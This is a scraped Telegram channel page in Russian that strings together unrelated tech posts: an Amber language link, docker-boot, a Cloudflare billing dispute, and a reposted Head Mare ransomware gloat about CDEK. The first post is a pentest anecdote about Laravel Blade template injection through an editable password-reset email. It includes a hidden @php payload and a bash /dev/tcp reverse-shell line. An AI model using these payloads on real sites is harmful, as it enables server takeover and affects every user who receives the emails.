Telegram Web Link
Forwarded from LD_ANARCHY
Кстати, а это про #поИб прямо и про самых заядлых нарушителей политик и вредителей безопасности ИБ в компании -- маркетологов! Они хотят и внешние JS притащить, и сервисы какие-то прокинуть и лендосостроителями быть на внещних сервисах да так, чтобы потом и DNS забыть удалить и довести до subdomain takeover, но сейчас не про это.

В рамках одно пентеста был просто неистовый ор и
1. Регистрация в админке, которая реально работает (да да да)
2. Конечно, там не всё доступно, функциональность урезана, но частично оказалась доступна функциональность редактирования писем с IDOR (дооо, это как оказалось потом -- это было очень нужно маркетологам было чтобы они быстро меняли тексты для нужд бизнеса). И вот когда я увидел там конструкцию {{smtng}}, да и зная что там #laravel стало понятно что перед лицом blade шаблонизатор в котором есть RCE через @php /*code*/ @endphp
3. Да, я взял первый попавшийся шаблон, а это было восстановление пароля, вставил туда <div style="display:none">@php phpinfo(); @endphp</div> и получил себе phpinfo в почту. Но так как это аффектило всех юзеров -- я сделал это невидимым через <div style="display:none">.

Что дальше можно сделать? Да все что угодно, да хоть ревесшел открывать через <div style="display:none">@php exec("/bin/bash -c 'bash -i >& /dev/tcp/REDACTED/8433 0>&1'"); @endphp</div>.
Маркетологи с их хотелками, которые ходят мимо ИБ -- зло, а разработчики что дают шаблонизаторы без секьбрити политик и ограничений -- тоже зло :)
Modern syntax
Amber is designed based on the ECMA script syntax. The goal was to create a syntax that any developer could feel comfortable with. Hence, Amber draws on features from languages like Rust and Python.

https://docs.amber-lang.com/getting_started/getting_started#type-safety

Amber the programming language compiled to bash
https://github.com/Ph0enixKM/Amber

ЗЫ
Даже на freshports уже есть 🌝
https://www.freshports.org/lang/amber/
This media is not supported in your browser
VIEW IN TELEGRAM
docker-boot replaces your current running system with an in-memory root filesystem constructed from a Docker image.

https://github.com/purplesyringa/docker-boot
TL;DR:

We've been on the Cloudflare Business plan ($250/month) for years. They suddenly contacted us and asked us to either pay them $120k up front for one year of Enterprise within 24 hours or they would take down all of our domains. While this escalated up our business we had 3 sales calls with them, trying to figure out what was happening and how to reach a reasonable contract in a week. When we told them we were also in talks with Fastly, they suddenly "purged" all our domains, causing huge downtime in our core business, sleepless nights migrating away from CF, irreparable loss in customer trust and weeks of ongoing downtime in our internal systems.

Cloudflare took down our website after trying to force us to pay 120k$ within 24h
https://robindev.substack.com/p/cloudflare-took-down-our-website

UPD

Из комментов
OP runs a casino/gambling site. Gambling is a regulatory mess (I have spent far too long dealing with this as an RNG supplier), and so it's very hard to comply with every jurisdiction, and each one needs you to prove compliance to operate in that jurisdiction.* Gaming companies spend a lot on compliance and tracking, but since the internet is the internet, it's pretty hard to enforce perfectly, so some countries and ISPs take this into their own hands.

Due to that, IPs hosting gambling and gaming sites often get regionally blocked by internet providers or otherwise flagged as hosting illegal content. Those regional blocks consequently affect the reputation score of the IP, and if you are a traffic aggregator like Cloudflare, can cause other customers to have issues. One of the most aggressive and annoying regulatory environments for gambling companies is the US, so it's very possible Cloudflare has had some trouble due to gambling use of their IPs in states in the USA.

Cloudflare wanted them to use the BYOIP features of the enterprise plan, and did not want them on Cloudflare's IPs. The solution was to aggressively sell the Enterprise plan, and in a stunning failure of corporate communication, not tell the customer what the problem was at all. The message from Cloudflare should have been "Enterprise plan + BYOIP or ban, and maybe we'll work with you on price" but it was instead "you would really like the Enterprise plan."

https://www.tg-me.com/hn_best_comments/22355
1/7 Хэд Марэ не дала времени #СДЭК на то, чтобы защитить себя. Сисадмины оказались слишком слабы. А политики безопасности не оправдали себя. #СДЭК продолжает нести знамя худшей доставки по России, обгоняя даже почту рф

2/7 Настройка и бекапирование корпоративных систем - дело неблагородное. «Что случилось с бекапами»? - Спрашивают консультанты по безопасности.- «Они пропали». - Отвечает им Хэд Марэ. Криворукие админы на маленькой зп делали бекап раз в полгода.

3/7 Шифровальщик крутится, данныемутятся. У #СДЭК серверов нет, но вы держитесь! Решения ваших бед не существует, даже не пытайтесь.

4/7 Клиенты #СДЭК не жалуйтесь. Посылки отменяются на неопределенное время. Проверьте ваш регион в перечне сбоев.

5/7 Убытки рассчитывать -это для господ. Все о ваших посылках – в надежных руках!

6/7 Дорогим консультантам с #BiZone отдельный привет. Ваш софт бесполезен, ваши безопасникипраздно шатаются на конференции #PHdays. Хэд Марэ любит тех, кто доверился Вам!

7/7 П.С. Alles, скажи "Да" неизвестному добряку с Дикси!

https://unrollnow.com/status/1795072931489345946

Оригинальный пост
https://x.com/head_mare/status/1795072931489345946
https://www.tg-me.com/Hinshtein/6558

Я весь в предвкушении, ждём охуительный postmortem 🌝
2024/05/29 05:28:12
Back to Top
HTML Embed Code: